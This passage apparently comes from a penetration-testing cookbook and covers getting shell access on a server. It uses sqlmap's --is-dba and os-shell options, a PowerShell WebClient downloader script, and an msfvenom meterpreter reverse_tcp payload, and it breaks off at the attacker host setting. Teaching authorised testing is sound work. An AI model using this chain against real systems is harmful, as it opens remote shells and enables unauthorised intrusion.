Shell uploads are fun; uploading web shells gives us more power to browse around the servers. In this recipe, you will learn some of the ways in which we can upload a shell on the server.
The following steps demonstrate the use of web shells:
- We first check whether the user is DBA by running sqlmap with the
--is-dba
flag:
- Then, we use
os-shell
, which prompts us with a shell. We then run the command to check whether we have privileges:
whoami
The following screenshot is an example of the preceding command:
- Luckily, we have admin rights. But we don't have RDP available to outside users. Let's try another way to get meterpreter access using PowerShell.
- We first create an object of
System.Net.WebClient
and save it as a PowerShell script on the system:
echo $WebClient = New-Object System.Net.WebClient > abc.ps1
- Now we create our
meterpreter.exe
viamsfvenom
using the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<...